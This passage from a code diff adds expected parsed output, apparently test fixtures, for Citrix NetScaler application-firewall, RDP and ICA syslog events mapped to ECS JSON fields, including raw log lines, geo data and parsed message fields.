allowed(512)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_HDR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "header_length": 550, + "max_allowed": { + "header_length": 512 + }, + "message": "Header(Referer) length(550) is greater than maximum allowed(512)." + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_HDR 4471 0 : Header(Referer) length(550) is greater than maximum allowed(512).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_QUERY 4471 0 : Query string length(1150) is greater than maximum allowed(1024).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Query string length(1150) is greater than maximum allowed(1024)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_QUERY", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_allowed": { + "query_string_length": 1024 + }, + "message": "Query string length(1150) is greater than maximum allowed(1024).", + "query_string_length": 1150 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_QUERY 4471 0 : Query string length(1150) is greater than maximum allowed(1024).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_TOTAL_HDR 4471 0 : Total HTTP header length(4600) is greater than maximum allowed(4096).", + "device_event_class_id": "APPFW", + "extended": { + "message": "Total HTTP header length(4600) is greater than maximum allowed(4096)." + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_BUFFEROVERFLOW_TOTAL_HDR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "max_allowed": { + "total_http_header_length": 4096 + }, + "message": "Total HTTP header length(4600) is greater than maximum allowed(4096).", + "total_http_header_length": 4600 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_BUFFEROVERFLOW_TOTAL_HDR 4471 0 : Total HTTP header length(4600) is greater than maximum allowed(4096).", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_TO_PROFILE 4471 0 : Profile: UserAccount", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: UserAccount" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_BIND_TO_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: UserAccount", + "profile": "UserAccount" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_TO_PROFILE 4471 0 : Profile: UserAccount", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_XML_TO_PROFILE 4471 0 : Profile: AdminSettings", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: AdminSettings" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_BIND_XML_TO_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: AdminSettings", + "profile": "AdminSettings" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_BIND_XML_TO_PROFILE 4471 0 : Profile: AdminSettings", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_FIELDTYPE 4471 0 : Field Type: String", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Type: String" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_FIELDTYPE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_type": "String", + "message": "Field Type: String" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_FIELDTYPE 4471 0 : Field Type: String", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_PROFILE 4471 0 : Profile: SecurityConfig", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: SecurityConfig" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: SecurityConfig", + "profile": "SecurityConfig" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_PROFILE 4471 0 : Profile: SecurityConfig", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_FIELDTYPE 4471 0 : Field Type: Integer", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Type: Integer" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_FIELDTYPE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_type": "Integer", + "message": "Field Type: Integer" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_FIELDTYPE 4471 0 : Field Type: Integer", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_PROFILE 4471 0 : Profile: NetworkPreferences", + "device_event_class_id": "APPFW", + "extended": { + "message": "Profile: NetworkPreferences" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_PROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Profile: NetworkPreferences", + "profile": "NetworkPreferences" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_PROFILE 4471 0 : Profile: NetworkPreferences", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_CFFIELD 4471 0 : Field Name: Username", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Name: Username" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_CFFIELD", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_name": "Username", + "message": "Field Name: Username" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_CFFIELD 4471 0 : Field Name: Username", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_CFFIELD 4471 0 : Field Name: Password", + "device_event_class_id": "APPFW", + "extended": { + "message": "Field Name: Password" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_CFFIELD", + "priority": "info" + }, + "citrix_adc": { + "log": { + "field_name": "Password", + "message": "Field Name: Password" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_CFFIELD 4471 0 : Field Name: Password", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_MEMORY_ERR 4471 0 : Content length is too large(4294967296 Bytes). Memory Allocation failed.", + "device_event_class_id": "APPFW", + "extended": { + "message": "Content length is too large(4294967296 Bytes). Memory Allocation failed." + }, + "facility": "local0", + "host": "ns1", + "name": "AF_MEMORY_ERR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "content_length_bytes": 4294967296, + "message": "Content length is too large(4294967296 Bytes). Memory Allocation failed." + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_MEMORY_ERR 4471 0 : Content length is too large(4294967296 Bytes). Memory Allocation failed.", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_SIGNATURE_ERR 4471 0 : Signature id 429 contains no fast match pattern", + "device_event_class_id": "APPFW", + "extended": { + "message": "Signature id 429 contains no fast match pattern" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_SIGNATURE_ERR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Signature id 429 contains no fast match pattern", + "signature_id": "429" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_SIGNATURE_ERR 4471 0 : Signature id 429 contains no fast match pattern", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_SESSIONLIMIT 4471 0 : Appfw maximum session Limit reached for PEID 42", + "device_event_class_id": "APPFW", + "extended": { + "message": "Appfw maximum session Limit reached for PEID 42" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_SESSIONLIMIT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Appfw maximum session Limit reached for PEID 42", + "peid": "42" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_SESSIONLIMIT 4471 0 : Appfw maximum session Limit reached for PEID 42", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_RFCPROFILE 4471 0 : APPFW RFC Profile: WebApplicationSecurity", + "device_event_class_id": "APPFW", + "extended": { + "message": "APPFW RFC Profile: WebApplicationSecurity" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_ADD_RFCPROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "appfw_rfc_profile": "WebApplicationSecurity", + "message": "APPFW RFC Profile: WebApplicationSecurity" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_ADD_RFCPROFILE 4471 0 : APPFW RFC Profile: WebApplicationSecurity", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_RFCPROFILE 4471 0 : APPFW RFC Profile: APIGatewaySecurity", + "device_event_class_id": "APPFW", + "extended": { + "message": "APPFW RFC Profile: APIGatewaySecurity" + }, + "facility": "local0", + "host": "ns1", + "name": "AF_RM_RFCPROFILE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "appfw_rfc_profile": "APIGatewaySecurity", + "message": "APPFW RFC Profile: APIGatewaySecurity" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW AF_RM_RFCPROFILE 4471 0 : APPFW RFC Profile: APIGatewaySecurity", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_NEW_SIGNATURE_ADDED 4471 0 : New signature available: RuleID = 101", + "device_event_class_id": "APPFW", + "extended": { + "message": "New signature available: RuleID = 101" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_NEW_SIGNATURE_ADDED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "New signature available: RuleID = 101", + "rule_id": "101" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_NEW_SIGNATURE_ADDED 4471 0 : New signature available: RuleID = 101", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "rule": { + "id": "101" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DEPLOY_RELAXATION_DP 4471 0 : Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles", + "device_event_class_id": "APPFW", + "extended": { + "message": "Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_DEPLOY_RELAXATION_DP", + "priority": "info" + }, + "citrix_adc": { + "log": { + "auto_deploy_mins": 15, + "message": "Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles", + "profile": "UserProfiles", + "violation_type": "XSS" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_DEPLOY_RELAXATION_DP 4471 0 : Learned rule will be auto-deployed after 15mins. ViolType: XSS. Profile: UserProfiles", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_EVENT 4471 0 : User Name: JohnDoe", + "device_event_class_id": "RDP", + "extended": { + "message": "User Name: JohnDoe" + }, + "facility": "local0", + "host": "ns1", + "name": "RDP_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "username": "JohnDoe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_EVENT 4471 0 : User Name: JohnDoe", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "JohnDoe" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JohnDoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_CONNECTION_EVENT 4471 0 : User Name: JaneSmith", + "device_event_class_id": "RDP", + "extended": { + "message": "User Name: JaneSmith" + }, + "facility": "local0", + "host": "ns1", + "name": "RDP_CONNECTION_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "username": "JaneSmith" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : RDP RDP_CONNECTION_EVENT 4471 0 : User Name: JaneSmith", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "JaneSmith" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JaneSmith" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_SETUP 4471 0 : session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_SETUP", + "priority": "info" + }, + "citrix_adc": { + "log": { + "access_type": "1", + "client_cookie": "xyz123", + "client_hostname": "client1", + "client_ip": "1.128.0.0", + "client_launcher": "1", + "client_type": "2", + "client_version": "1.0.0", + "connection_priority": "5", + "device_serial_number": "1001", + "domain_name": "example.com", + "flags": "12345", + "message": "session_guid ABC123 - device_serial_number 1001 - client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1", + "server": { + "name": "ServerA" + }, + "session_guid": "ABC123", + "session_setup_time": "2023-04-05T12:34:56Z", + "status": "1", + "username": "user1" + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_SETUP 4471 0 : session_guid ABC123 - device_serial_number 1001 - 